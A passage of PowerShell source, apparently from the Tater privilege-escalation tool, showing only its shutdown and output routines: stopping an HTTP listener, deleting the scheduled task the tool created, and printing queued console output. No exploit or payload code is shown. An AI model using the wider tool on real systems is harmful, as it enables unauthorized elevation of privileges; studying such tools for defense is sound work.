1 $tater.HTTP_listener.Stop() $tater.running = $false if($tater.task_delete -and $tater.task_added) { $scheduled_task_deleted = $false $schedule_service = new-object -com("Schedule.Service") $schedule_service.connect() $scheduled_task_folder = $schedule_service.getfolder("\") $scheduled_task_list = $scheduled_task_folder.gettasks(1) foreach($scheduled_task in $scheduled_task_list) { if($scheduled_task.name -eq $tater.task) { $scheduled_task_folder.DeleteTask($scheduled_task.name,0) } } foreach($scheduled_task in $scheduled_task_list) { if($scheduled_task.name -eq $tater.task) { $scheduled_task_deleted = $true } } if($scheduled_task_deleted) { Write-Output ("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deleted successfully") } else { Write-Output ("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deletion failed, remove manually") } } elseif($tater.task_added) { Write-Output ("$(Get-Date -format 's') - Remove scheduled task " + $tater.task + " manually when finished") } Write-Output "$(Get-Date -format 's') - Tater has been stopped" } else { Write-Output "Tater isn't running" } } else { Write-Output "Tater isn't running" } Remove-Variable tater -scope global } function Get-Tater { <# .SYNOPSIS Get-Tater will display queued Tater output. #> while($tater.console_queue.Count -gt 0) { Write-Output($tater.console_queue[0] + $tater.newline) $tater.console_queue.RemoveRange(0,1) } }